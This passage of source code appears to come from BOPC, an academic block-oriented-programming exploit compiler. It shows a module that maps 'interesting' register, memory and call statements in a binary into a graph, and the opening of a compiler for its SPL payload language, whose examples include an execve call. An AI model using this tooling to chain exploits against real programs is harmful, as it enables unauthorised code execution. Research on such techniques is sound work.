*\nimport path as P\n\nimport networkx as nx\nimport textwrap\nimport datetime\nimport cPickle as pickle\nimport math\nimport numpy\n\n\n\n# -----------------------------------------------------------------------------\n# Capability Options\n# -----------------------------------------------------------------------------\nCAP_ALL             = 0x00FF                        # all types of statements\nCAP_REGSET          = 0x0001                        # register assignments \nCAP_REGMOD          = 0x0002                        # register modifications\nCAP_MEMRD           = 0x0004                        # memory reads\nCAP_MEMWR           = 0x0008                        # memory writes\nCAP_CALL            = 0x0010                        # system and library calls\nCAP_COND            = 0x0020                        # conditional statements\nCAP_LOAD            = 0x0100                        # load the capability graph from a file\nCAP_SAVE            = 0x0200                        # save the capability graph to a file\nCAP_NO_EDGE         = 0x0400                        # don't calculate edges in capability graph\n\n# types of analyses\nCAP_STMT_COMB_CTR   = 'STMT_COMB_CTR'               # Count combinations of statements\nCAP_STMT_MIN_DIST   = 'STMT_MIN_DIST'               # Count min distance between statements\nCAP_LOOPS           = 'LOOPS'                       # Analyze loops\n\n\n\n# -------------------------------------------------------------------------------------------------\n# capability: This class is responsible for performing several measurements in the target binary.\n#\nclass capability( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL VARIABLES                                    '''\n    ''' ======================================================================================= '''\n    __cap = nx.DiGraph()                            # the capability graph (CAP)\n    __uid = 0                                       # a unique ID\n    \n\n\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __add(): Add a node to the capability graph.\n    #\n    # :Arg addr: Address of the basic block tha contains the statement\n    # :Arg ty: Statement type: regset / regmod / call / cond\n    # :Arg reg: Register name (for regset/regmod/cond)\n    # :Arg val: Statement's value (for regset/regmod/cond)\n    # :Arg mode: Statement mode (const/deref for regset and syscall/libcall for call)\n    # :Arg isW: A flag indicating whether \"val\" points to a writable address (for regset)\n    # :Arg op: Statement operator (for regmod/cond)\n    # :Arg mem: Memory address (for memrd/memwr)\n    # :Arg name: Function name (for call)\n    # :Ret: None.\n    #\n    def __add( self, addr, ty, reg=None, val=None, mode=None, isW=None, op=None, name=None, mem=None, size=None ):\n        # NOTE: We assume that arguments are not malformed, so we don't do any checks\n        cap = {\n            'regset' : {'addr':int(addr), 'type':ty, 'reg':reg, 'val':val, '+W':isW, 'mode':mode},\n            'regmod' : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val},\n            'memrd'  : {'addr':int(addr), 'type':ty, 'reg':reg, 'mem':mem, 'size':size},\n            'memwr'  : {'addr':int(addr), 'type':ty, 'mem':mem, 'val':val, 'size':size},\n            'call'   : {'addr':int(addr), 'type':ty, 'name':name, 'mode':mode},\n            'cond'   : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val}\n        }[ ty ]                                     # nicely \"switch\" the appropriate statement\n     \n        self.__cap.add_node(self.__uid, **cap)      # add statement to the graph\n        self.__uid += 1                             # update UID counter\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Simply initialize private variables.\n    #\n    # :Arg cfg: Program's CFG.\n    # :Arg name: Program's filename\n    #\n    def __init__( self, cfg, name ):       \n        self.__cfg  = cfg                           # save cfg to internal variables\n        self.__name = name                          # program's filename\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # build(): Build the Capability Graph. This is a very slow process, so it's possible to save\n    #       the graph once its generated, thus without having to re-calculate it the next time.\n    #       \n    # :Arg options: An integer that describes how the capability graph should be built. It can be\n    #       the logical OR of one or more of the following:\n    #\n    #       CAP_ALL     | Include all types of statements in the graph\n    #       CAP_REGSET  | Include register assignments in the graph\n    #       CAP_REGMOD  | Include register modifications in the graph\n    #       CAP_CALL    | Include system and library calls in the graph\n    #       CAP_COND    | Include conditional statements in the graph\n    #       CAP_LOAD    | Load the capability graph from a file\n    #       CAP_SAVE    | Save the capability graph to a file\n    #\n    # :Ret: None.\n    #\n    def build( self, options=CAP_ALL ):\n        dbg_prnt(DBG_LVL_1, \"Exploring program's capability...\")\n\n        # ---------------------------------------------------------------------\n        # Load Capability Graph from file ?\n        # ---------------------------------------------------------------------       \n        if options & CAP_LOAD:\n            dbg_prnt(DBG_LVL_1, \"Loading the Capability Graph from file...\")\n\n            try:\n                self.__cap = nx.read_gpickle(self.__name + '.cap')\n\n                dbg_prnt(DBG_LVL_1, \"Done.\")            \n\n                return                              # your job is done here\n\n            except IOError, err:\n                # if you can't load it, simply re-calculate it ;)\n\n                error(\"Cannot load Capability Graph: %s\" % str(err))\n\n\n        # ---------------------------------------------------------------------\n        # Iterate over abstracted basic blocks\n        # ---------------------------------------------------------------------       \n        dbg_prnt(DBG_LVL_1, \"Searching CFG for 'interesting' statements...\")\n\n        nnodes  = len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items())\n        counter = 1\n        \n        p = P._cfg_shortest_path(self.__cfg)\n\n\n        for node, abstr in nx.get_node_attributes(self.__cfg.graph,'abstr').iteritems():\n            addr = node.addr\n\n            dbg_prnt(DBG_LVL_3, \"Analyzing block at 0x%x (%d/%d)...\" % (addr, counter, nnodes))\n        \n\n            if options & CAP_REGSET:\n                for reg, data in abstr['regwr'].iteritems():\n\n                    if data['type'] == 'concrete':\n                        self.__add(addr, ty='regset', reg=reg, val=data['const'], mode='const',\n                                         isW=data['writable'])\n\n                    elif data['type'] == 'deref':\n                        self.__add(addr, ty='regset', reg=reg, val=data['addr'], mode='deref')\n          \n\n            if options & CAP_REGMOD:\n                for reg, data in abstr['regwr'].iteritems():\n                    if data['type'] == 'mod':                                               \n                        self.__add(addr, ty='regmod', reg=reg, op=data['op'], val=data['const'])\n\n\n            if options & CAP_MEMRD:\n                for reg, data in abstr['regwr'].iteritems():\n                    if data['type'] == 'deref' and data['memrd']:\n                        loadreg = data['deps'][0]\n\n                        self.__add(addr, ty='memrd', reg=reg, mem=loadreg, size=data['memrd'])\n        \n            \n            if options & CAP_MEMWR:\n                for memwr in abstr['splmemwr']:\n                    self.__add(addr, ty='memwr', mem=memwr['mem'], val=memwr['val'], size=memwr['size'])\n\n\n\n            if options & CAP_CALL and abstr['call'] and find_call(abstr['call']['name']):\n                self.__add(addr, ty='call', name=abstr['call']['name'], mode=abstr['call']['type'])\n\n\n            elif options & CAP_COND and abstr['cond']:\n            \n                # elif because we can't have call and cond at the same basic block\n                self.__add(addr, ty='cond', reg=abstr['cond']['reg'], op=abstr['cond']['op'],\n                                 val=abstr['cond']['const'])\n\n\n                '''\n                # -----------------------------------------------------------------------\n                # hacky way to quickly find a loop\n                # -----------------------------------------------------------------------\n                for length, loop in p.k_shortest_loops(addr, 0, 10):\n                    length, loop = p.shortest_loop(addr)\n\n                    R = abstr['cond']['reg']\n\n                    regmod = 0\n                    regset = 0\n                    step = 0\n\n                    if length < INFINITY:\n\n                        for l in loop[:-1]:\n                            try:\n                                X = self.__cfg.graph.node[ADDR2NODE[l]]['abstr']\n                            except KeyError:\n                                continue\n                \n                            for reg, data in X['regwr'].iteritems():\n                                if data['type'] == 'mod' and reg == R:\n                                    regmod += 1\n                                    step = data['const']\n\n                                elif reg == R:\n                                    regset += 1\n\n\n                        if regmod == 1 and regset == 0:\n                            emph(bolds('GOOD LOOP (%d - %d - %s) %s' % \n                                    (abstr['cond']['const'], step, abstr['cond']['op'], \n                                    pretty_list(loop))))\n\n                        # else:\n                        #    print 'BAD LOOP (mod: %d, set: %d) (%d - %d - %s) %s' % \\\n                        #        (regmod, regset, abstr['cond']['const'], step, abstr['cond']['op'],\n                        #        pretty_list(loop))\n                '''\n\n            counter += 1                            # update counter\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n\n        # ---------------------------------------------------------------------\n        # Show some statistics\n        # ---------------------------------------------------------------------       \n        emph(\"Binary has %s interesting statements:\" % bold(self.__cap.order()))\n\n        stmt_ctr = { 'regset' : 0, 'regmod' : 0, 'memrd' : 0, 'memwr' : 0, 'call' : 0, 'cond' : 0 }\n        \n        for _, data in self.__cap.nodes(data=True):\n             stmt_ctr[ data['type'] ] += 1          # count statements\n\n\n        emph(\"\\t%s register assignments\"   % bold(stmt_ctr['regset'], pad=5))\n        emph(\"\\t%s register modifications\" % bold(stmt_ctr['regmod'], pad=5))\n        emph(\"\\t%s memory reads     \"      % bold(stmt_ctr['memrd'], pad=5))\n        emph(\"\\t%s memory writes    \"      % bold(stmt_ctr['memwr'], pad=5))\n        emph(\"\\t%s system/library calls\"   % bold(stmt_ctr['call'], pad=5))\n        emph(\"\\t%s conditional jumps\"      % bold(stmt_ctr['cond'], pad=5))\n\n\n        # ---------------------------------------------------------------------\n        # Add edges to the Capability Graph\n        # ---------------------------------------------------------------------\n\n        # don't calculate edges if asked (it's time consuming)\n        if options & CAP_NO_EDGE:\n            dbg_prnt(DBG_LVL_1, \"Skipping edge calculation of capability graph.\")\n            return\n\n\n        dbg_prnt(DBG_LVL_1, \"Building the Capability Graph...\")\n\n\n        # list of node addresses\n        node_list = [ d['addr'] for _, d in self.__cap.nodes_iter(data=True) ]    \n        SPT       = nx.DiGraph()                    # create the Shortest Path Tree\n        completed = 0                               # % completed\n\n        csp = P._cfg_shortest_path(self.__cfg)      # create the CFG Shortest Path object\n\n\n        warn(\"This can be a very slow process ('-dd' and '-ddd' options show a progress bar)\")\n\n        # for each node u_ in Capability Graph\n        for u_, du in self.__cap.nodes_iter(data=True):            \n            v_ = -1                                 # v_ is the uid of the target node (u_ -> v_)            \n\n            SPT.clear()                             # clear Shortest Path Tree\n\n            # Find the shortest paths (in CFG) to every other statement. Unfortunately, shortest\n            # paths in CFG are not like regular shortest paths, as we explain in path.py. Thus we\n            # have to re-calculate all shortest paths for every node in the capability graph.\n            for length, path in csp.shortest_path(du['addr'], node_list):\n                v_ += 1                             # the uid of the current node (it's linear)\n\n                if length == INFINITY:\n                    continue                        # skip nodes with non-existing paths\n\n                # ---------------------------------------------------------------------------------\n                # Now, if we directly add the edges with shortest path lengths to the capability\n                # graph, we'll have an interesting problem: Consider the path A - x - x - B - x - C\n                # in CFG. The Capability Graph should contain the edges (A, B, 3) and (B, C, 2). \n                # However the naive approach, will also add the edge (A, C, 5) to the graph. The\n                # problem here is that we cannot accurately measure chains of statements due to the\n                # direct edges.\n                #\n                # To fix this issue we build the Shortest Path Tree (SPT). That is, we merge all\n                # shortest paths, into a single graph. The resulting graph will be tree as it\n                # consists only of single source shortest paths (without loops), with all edges\n                # having weight = 1. SPT has two types of nodes: Black and White. Black nodes \n                # contain statements (should appear on capability graph) while White nodes are used\n                # for transitions. The first and the last nodes of each shortest path are Black\n                # while every other node between is White. Our goal is to remove all White nodes\n                # and merge the resulting SPT with the capability graph.\n                #\n                # We remove the White nodes one by one. When we remove a White node, we also update\n                # the weights in SPT.\n                # ---------------------------------------------------------------------------------\n               \n                # add first and last nodes (Black) to the SPT (if already exists, make them Black)\n                SPT.add_nodes_from([path[0], path[-1]], color='Black')\n\n                # keep track of the statement uids that use this node (map address to UID)\n                SPT.node[path[0] ].setdefault('uid', set()).add(u_)\n                SPT.node[path[-1]].setdefault('uid', set()).add(v_)\n\n                # convert nodes [1,2,3,4], into edges [(1,2),(2,3),(3,4)] and add them to SPT\n                SPT.add_edges_from(zip(path, path[1:]), weight=1)\n\n                # color the intermediate nodes White (if they're not Black)\n                for p in path[1:-1]:\n                    if 'color' not in SPT.node[p] or SPT.node[p]['color'] != 'Black':\n                         SPT.node[p]['color'] = 'White'\n\n\n            # iteratively delete the White nodes\n            for n in [node for node, data in SPT.nodes(data=True) if data['color'] == 'White']:\n\n                # for each pair of (incoming, outgoing) edges\n                for src, _, d1 in SPT.in_edges(n, data=True):\n                    for _, dst, d2 in SPT.out_edges(n, data=True):\n                        # add a new edge that bypasses the White node\n                        SPT.add_edge(src, dst, weight=d1['weight']+d2['weight'])\n\n\n                SPT.remove_node(n)                  # delete White node (along with its edges)\n\n\n            ''' at this point, SPT will only contain Black nodes '''\n\n            # merge SPT to the capability graph\n            for e1, e2, data in SPT.edges_iter(data=True):\n                # copy it edge-by-edge\n                for u in SPT.node[e1]['uid']:       # move from addresses back to UIDs\n                    for v in SPT.node[e2]['uid']:   \n                        if u != v:                  # that's to avoid self-loops\n                            self.__cap.add_edge(u, v, weight=data['weight'])\n                            \n\n            # show current progress (%)\n            percent = math.floor(100. / len(self.__cap) * u_)\n            if completed < percent:\n                completed = percent            \n                dbg_prnt(DBG_LVL_2, \"%d%% completed\" % completed)\n\n        del SPT                                     # we don't need the SPT anymore\n\n        dbg_prnt(DBG_LVL_1, \"Done. Capability Graph generated successfully.\")\n      \n        visualize(self.__cap)\n\n     \n\n        # ---------------------------------------------------------------------\n        # Save Capability Graph to a file ?\n        # ---------------------------------------------------------------------       \n        if options & CAP_SAVE:\n            dbg_prnt(DBG_LVL_1, \"Saving Capability Graph...\")\n\n            try:\n                nx.write_gpickle(self.__cap, self.__name + '.cap')\n                dbg_prnt(DBG_LVL_1, \"Done. Capability Graph saved as %s\" % self.__name + '.cap')\n\n            except IOError, err:\n                error(\"Cannot save Capability Graph: %s\" % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # get(): Return the Capability Graph. Just in case ;)\n    #\n    # :Ret: The Capability Graph\n    #\n    def get( self ):\n        return self.__cap\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # save(): Save the nodes of the Capability Graph (i.e., the interesting statements) to a file.\n    #\n    # :Ret: None.\n    #\n    def save( self ):\n        now    = datetime.datetime.now()            # get current timestamp\n        banner = textwrap.dedent(\"\"\"\\\n            #\n            # This file has been created by BOPC at %s\n            # '%s' has %d interesting statements. Each line shows a statement.\n            #\n            # The columns are: address | type | register | value | mode | +W | operator | name\n            # When an attribute is not available, a dot '.' is presented.\n            #\n            #\n            # Attribute list:\n            #\n            #   address  : Address of the basic block tha contains the statement\n            #   type     : Statement type: regset / regmod / call / cond\n            #   register : Register name (for regset / regmod / cond)\n            #   memory   : Memory address (for memrd / memwr)\n            #   value    : Statement's value (for regset / regmod / cond)\n            #   mode     : Statement mode (const / deref for regset and syscall / libcall for call)\n            #   +W       : A flag indicating whether \"val\" points to a writable address (for regset)\n            #   operator : Statement operator (for regmod / cond)\n            #   name     : Function name (for call)\n            #\n        \"\"\" % (now.strftime(\"%d/%m/%Y %H:%M\"), self.__name, self.__cap.order()))\n\n\n        dbg_prnt(DBG_LVL_1, \"Dumping interesting statments to a file...\")    \n         \n        try:    \n            cap = open(self.__name + '.stmt', 'w')\n\n            cap.write(banner)                       # write banner first\n\n            # write statements one by one\n            for _, d in self.__cap.nodes_iter(data=True):                  \n                opt  = '%10s'   % (d['reg']  if 'reg'  in d else '.')\n                opt += '%10s'   % (d['mem']  if 'mem'  in d else '.')\n                opt += ' %32s ' % (d['val']  if 'val'  in d else '.')\n                opt += '%10s'   % (d['mode'] if 'mode' in d else '.')\n                opt += '%10s'   % (d['+W']   if '+W'   in d else '.')\n                opt += '%10s'   % (d['op']   if 'op'   in d else '.')\n                opt += '%16s'   % (d['name'] if 'name' in d else '.')\n                opt += '%10s'   % (d['size'] if 'size' in d else '.')\n\n                cap.write( \"0x%08x %10s %s\\n\" % (d['addr'], d['type'], opt) )\n                       \n            cap.close()\n           \n            dbg_prnt(DBG_LVL_1, \"Done. Capability Graph saved as %s\" % self.__name + '.stmt')\n\n        except IOError, err:\n            error(\"Cannot create statements file: %s\" % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # explore(): Explore the Capability Graph and look for \"islands\".\n    #    \n    # :Ret: None.\n    #\n    def explore( self ):        \n        dbg_prnt(DBG_LVL_1, \"Exploring the Capability Graph...\")\n\n        self.__islands = []                         # store islands here\n        n_inslands     = 0                          # number of islands\n        size, diam     = [], []                     # size and diameter lists\n        \n\n        # ---------------------------------------------------------------------\n        # The first step is to extract the \"islands\" from the Capability Graph,\n        # which are essentially the Strong Connected Components (SCC) of the\n        # undirected version of the graph.\n        # ---------------------------------------------------------------------\n        capU      = self.__cap.to_undirected()      # make Capability Graph undirected\n        unvisited = set(capU.nodes())               # initially, no node is visited\n\n        while len(unvisited):                       # while there are unvisited nodes\n            root = unvisited.pop()                  # pick a random node\n            unvisited.add( root )                   # and remove it from set\n            \n            nodeset = []                            # nodes in the current island\n\n            # explore the island using DFS and obtain the node set\n            for u in nx.dfs_preorder_nodes(capU, root):            \n                unvisited.remove(u)                 # mark u as visited\n                nodeset.append(u)                   # and add it to node set\n\n                self.__cap.node[ u ]['island'] = n_inslands\n            \n\n            # get island as induced (directed) subgraph and relabel nodes in [0, order(G)-1] range\n            graph   = self.__cap.subgraph(nodeset)    \n            relabel = dict(zip(graph.nodes(), range(graph.order())))\n            graph   = nx.relabel_nodes(graph, relabel)\n            \n\n            # ---------------------------------------------------------------------\n            # Calculate island's diameter. Although the island is fully connected\n            # in the undirected version, it's not in the directed version. Thus,\n            # nx.diameter(graph) throws an exception. The diameter of the island,\n            # is the longest shortest path between any two nodes.\n            # ---------------------------------------------------------------------\n            D = 0                                   # island's diameter\n\n            for n in graph.nodes_iter():\n                # caclulate all shortest paths from the given node\n                length = nx.single_source_shortest_path_length(graph, n)\n                maxlen = max(length.values())       # get the longest shortest path\n\n                if D < maxlen: D = maxlen           # keep track of the longest among all nodes\n\n\n            size.append(len(nodeset))               # island size\n            diam.append( D)                         # island's diameter\n\n            self.__islands.append( {                # store island's information\n                'root'     : root,\n                'size'     : graph.order(),\n                'diameter' : D,\n                'graph'    : graph\n            } )\n   \n            n_inslands += 1                         # total # islands\n\n        dbg_prnt(DBG_LVL_1, \"Done.\")\n\n\n        # ---------------------------------------------------------------------\n        # Show some statistics\n        # ---------------------------------------------------------------------      \n        warn(\"'-dd' and '-ddd' options show the 'size' and 'diameter' lists\")\n\n        emph(\"Capability Graph has %s islands\" % bold(n_inslands))\n\n        emph(\"Island sizes: max = %s, min = %s, avg = %s\" % \n            (bold(max(size)), bold(min(size)), bold(1.*sum(size)/n_inslands, 'float')))\n\n        dbg_arb(DBG_LVL_2, \"Island size list\", size)\n\n        emph(\"Island diameters: max = %s, min = %s, avg = %s\" % \n            (bold(max(diam)), bold(min(diam)), bold(1.*sum(diam)/n_inslands, 'float')))\n\n        dbg_arb(DBG_LVL_2, \"Island diameter list\", diam)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # analyze(): Perform various analyses to the islands of the Capability Graph.\n    #\n    # :Arg analyses: The analyses to perform (can be many)\n    # :Ret: None.\n    #\n    def analyze( self, *analyses ):\n        dbg_prnt(DBG_LVL_1, \"Analyzing the Capability Graph...\")\n\n        for analysis in analyses:                   # for every different analysis\n            try:\n                # based on the analysis, select the appropriate function and invoke it\n                func = {\n                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,\n                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,\n                    CAP_LOOPS         : self.__analyze_loops\n                }[ analysis ]\n\n\n                for island in self.__islands:       # perform the analysis to every island\n                    func( island['graph'] )\n\n            except KeyError, err:\n                fatal('Unknow analysis %s' % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # analyze_island(): Analyze a specific island.\n    #\n    # :Arg addr: An address of any node of the island\n    # :Arg analyses: The analyses to perform (can be many)\n    # :Ret: None.\n    #\n    def analyze_island( self, addr, *analyses ):\n        # ---------------------------------------------------------------------\n        # Search for the island to analyze\n        # ---------------------------------------------------------------------\n        island_id = -1\n\n        for _, d in self.__cap.nodes_iter(data=True):\n            if d['addr'] == addr:\n                island_id = d['island']\n                break\n\n        if island_id < 0:\n            fatal(\"Node '0x%x' does not contained in any island\" % addr)\n\n        dbg_prnt(DBG_LVL_1, \"Analyzing the Island %d...\" % island_id)\n\n\n        # ---------------------------------------------------------------------\n        # Perform the analyses\n        # ---------------------------------------------------------------------\n        for analysis in analyses:                   # for every different analysis\n            try:\n                # based on the analysis, select the appropriate function and invoke it\n                func = {\n                    CAP_STMT_COMB_CTR : self.__analyze_stmt_comb_ctr,\n                    CAP_STMT_MIN_DIST : self.__analyze_stmt_min_dist,\n                    CAP_LOOPS         : self.__analyze_loops\n                }[ analysis ]\n\n                func( self.__islands[ island_id ]['graph'] )\n\n            except KeyError, err:\n                fatal('Unknow analysis %s' % str(err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # callback(): Invoke a callback function for every island.\n    #\n    # :Arg cbfunc: The callback function to invoke\n    # :Ret: None.\n    #\n    def callback( self, cbfunc ):\n        for island in self.__islands:\n            cbfunc( island['graph'] )\n\n    \n    # TODO: Move these to private function sections\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __analyze_stmt_comb_ctr(): Count the total number of combinations that K SPL statements can\n    #       be chained together (repetitions of statements are allowed) on a given island.\n    #    \n    # :Arg island: The island graph to work on\n    # :Ret: None.\n    #\n    def __analyze_stmt_comb_ctr( self, island ):\n        dbg_prnt(DBG_LVL_1, \"Starting Analysis: Statement Combinations...\")\n\n\n        # TODO: Check this again. Too many combinations :\\\n        K = 20\n\n\n        # ---------------------------------------------------------------------\n        # Find the total number of paths between any 2 nodes that use exactly\n        # K edges. We calculate that using Dynamic Programming. Let C^k_{ij} be\n        # the total number of paths from i to j with exactly k edges. Then we\n        # have:\n        #\n        #              C^0_{ii} = 1, forall i in V\n        #   C^k_{ij} = C^1_{ij} = 1, iff (i,j) in E\n        #              C^k_{ij} = SUM(C^{k-1}_[xj]),  for all x adjacent to i\n        #\n        # We build this table in a bottom-up fashion. Time/Space Complexity is \n        # O(|V|^2 * K). We can improve space complexity by storing only the\n        # last 2 K's (K and K-1).\n        # ---------------------------------------------------------------------\n        C = numpy.zeros((K, island.order(), island.order()), dtype=numpy.int64)\n        \n        for i in range(island.order()):             # initialize for K = 0\n            C[0][i][i] = 1\n        \n        for i,j, d in island.edges_iter(data=True): # initialize for K = 1\n            C[1][i][j] = 1\n        \n        for k in range(2, K):                       # main loop\n            for i in island.nodes():\n                for j in island.nodes():\n                    for x in island.neighbors(i):\n                        C[k][i][j] += C[k-1][x][j]\n\n        # ---------------------------------------------------------------------\n        for k in range(K):\n            dbg_arb(DBG_LVL_1, \"Combinations with up to %d statements:\", sum(sum(C[k][:][:])))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __analyze_stmt_min_dist(): Calculate the minimum distance with between any two statements\n    #       that have exactly K edges between on a given island.\n    #\n    # :Arg island: The island graph to work on\n    # :Ret: None.\n    #\n    def __analyze_stmt_min_dist( self, island ):\n        '''\n        B = { }\n\n        # enumerate all simple paths from i to j \n        # WARNING: O(n!) complexity !!!\n        for i in island.nodes_iter():\n            for j in island.nodes_iter():\n                if i == j: continue\n\n                for x in nx.all_simple_paths(island, i, j):\n \n                    A = [island[a][b]['weight'] for a,b in zip(x, x[1:])]\n\n                    B.setdefault(len(x), []).append(sum(A))\n        '''\n\n\n        dbg_prnt(DBG_LVL_1, \"Starting Analysis: Statement Minimum Distances...\")\n\n\n        K = 20\n\n        # ---------------------------------------------------------------------\n        # Find the minimum distance between any 2 nodes that use exactly K edges.\n        # This is very similar with the algorithm in __analyze_stmt_comb_ctr(),\n        # but with different Dynamic Programming equations:\n        #\n        #              M^0_{ii} = 0, forall i in V\n        #   M^k_{ij} = M^1_{ij} = weight[i][j], iff (i,j) in E\n        #              M^k_{ij} = MIN(M^k_[ij], weight[i][x] + M^{k-1}_{xj}), \n        #                                              for all x adjacent to i\n        # ---------------------------------------------------------------------\n        M = numpy.full((K, island.order(), island.order()), dtype=numpy.int32, fill_value=INFINITY)\n        \n\n        for i in range(island.order()):             # initialize for K = 0\n            M[0][i][i] = 0\n        \n        for i,j, d in island.edges_iter(data=True): # initialize for K = 1\n            M[1][i][j] = d['weight']\n        \n        for k in range(2, K):                       # main loop\n            for i in island.nodes():\n                for j in island.nodes():\n                    for x in island.neighbors(i):                        \n\n                        M[k][i][j] = min(M[k][i][j], island[i][x]['weight'] + M[k-1][x][j])\n\n        # ---------------------------------------------------------------------\n        for k in range(K):\n            m = numpy.min(M[k][:][:])            \n            if m == INFINITY: break\n\n            dbg_prnt(DBG_LVL_1, \"Min shortest path with up to %d statements: %d\" % (k, m))\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __analyze_loops(): Analyze the loops on an a given island.\n    #    \n    # :Arg island: The island graph to work on\n    # :Ret: None.\n    #\n    def __analyze_loops( self, island ):\n        warn('Loop analysis is not supported yet')\n       \n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/compile.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# compile.py:\n#\n# This module compiles an program written in SPL into an equivalent Intermediate Representation\n# (IR) suitable for processing by subsequent modules. Please do not confuse it with the VEX IR.\n#\n# SPL is actually a subset of C, so it has the same syntax. Comments are denoted with '//'. Multi\n# line comments are not supported.The specs of the language (expressed in EBNF) are shown below:\n#\n#       <SPL>    := 'void' 'payload' '(' ')' '{' <stmts> '}'\n#       <stmts>  := ( <stmt> | <label> )* <return>?\n#       <stmt>   := <varset> | <regset> | <regmod> | <memrd> | <memwr> | <call> | <cond> | <jump>\n#\n#       <varset> := 'int' <var> '=' <rvalue> ';'\n#                 | 'int' <var> '=' '{'  <rvalue> (',' <rvalue>)* ';'\n#                 | 'string' <var> '=' <str> ';'\n#       <regset> := <reg> '=' <rvalue> ';'\n#       <regmod> := <reg> <asgop> <number> ';'\n#       <memrd>  := <reg> '=' '*' <reg> ';'\n#       <memwr>  := '*' <reg> '=' <reg> ';'\n#       <call>   := <var> '(' (e | <reg> (',' <reg>)*) ')'\n#       <label>  := <var> ':'\n#       <cond>   := 'if' '(' <reg> <cmpop> <number> ')' 'goto' <var> ';'\n#       <jump>   := 'goto' <var> ';'\n#       <return> := 'return' <number> ';'\n#\n#       <reg>    := '__r' <regid>\n#       <regid>  := [0-7]\n#       <var>    := [a-zA-Z_][a-zA-Z_0-9]*\n#       <number> := ('+' | '-') [0-9]+ | '0x' [0-9a-fA-F]+\n#       <rvalue> := <number> | '&' <var>\n#       <str>    := '\"' [.]* '\"'\n#       <asgop>  := '+=' | '-=' | '*=' | '/=' | '&=' | '|=' | '~=' | '^=' | '>>=' | '<<='\n#       <cmpop>  := '==' | '!=' | '>' | '>=' | '<' | '<='\n#\n#\n# Here's how the IR looks like:\n#\n#   {'uid': 2, 'type': 'regset', 'reg': 0, 'valty': 'num', 'val': -10}\n#   {'uid': 6, 'type': 'varset', 'name': 'test', 'val': ['a1']}\n#   {'uid': 10,'type': 'varset', 'name': 'bar',\n#                           'val': ['\\xd2\\x04\\x00\\x00\\x00\\x00\\x00\\x00', ('foo',), ('test',)]}\n#   {'uid': 12, 'type': 'regset', 'reg': 6, 'valty': 'var', 'val': ('bar',)}\n#   {'uid': 18, 'type': 'regmod', 'reg': 6, 'op': '+', 'val': 17712}\n#   {'uid': 6,  'type': 'memrd', 'reg': 0, 'mem': 1}\n#   {'uid': 8,  'type': 'memwr', 'mem': 0, 'val': 1}\n#   {'uid': 20, 'type': 'label'}\n#   {'uid': 24, 'type': 'call', 'name': 'execve', 'args': [0, 1, 6], 'dirty': ['rax', 'rcx', 'rdx']}\n#   {'uid': 30, 'type': 'cond', 'reg': 0, 'op': '==' 'num': 11, 'target': '@__26'}\n#   {'uid': 32, 'type': 'jump', 'target': '@__20'}\n#   {'uid': 34, 'type': 'return', 'target': 0xdead}\n#\n# NOTE: The compiler is implemented using regular expressions, and not using flex/bison, as it's\n#   too simple. So, be careful about the language syntax, as very small differences (that may not\n#   affect other languages) can result in syntax errors.\n#\n#\n# * * * ---===== TODO list =====--- * * *\n#\n#   [1]. Consider the control flow of the SPL program upon \"Semantic check #4\".\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nfrom calls     import *\n\nimport struct\nimport shlex\nimport re\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\nN_VIRTUAL_REGISTERS = 8                             # number of virtual registers\n\nSTATE_IDLE          = 0                             # program is in idle state\nSTATE_START         = 1                             # state after we encounter !PROGRAM START\nSTATE_END           = 2                             # state after we encounter !PROGRAM END\n\n# tokens come in tuples (symbol, lineno). To make code easier to read, don't use 0 and 1 to\n# access them, but instead use T and L\nT = 0\nL = 1\n\n# Instead of incrementing pc and uid by one, we can increment them by two (or by larger intervals).\n# This has to do with optimization. If we want to \"inject\" a new statement, we can do that without\n# modifying the pc/uid of the other statements.\n_STEP_UP = 2                                        # 2 is ok for current optimizer\n\n\n# WARNING: Don't try to use modulo operator 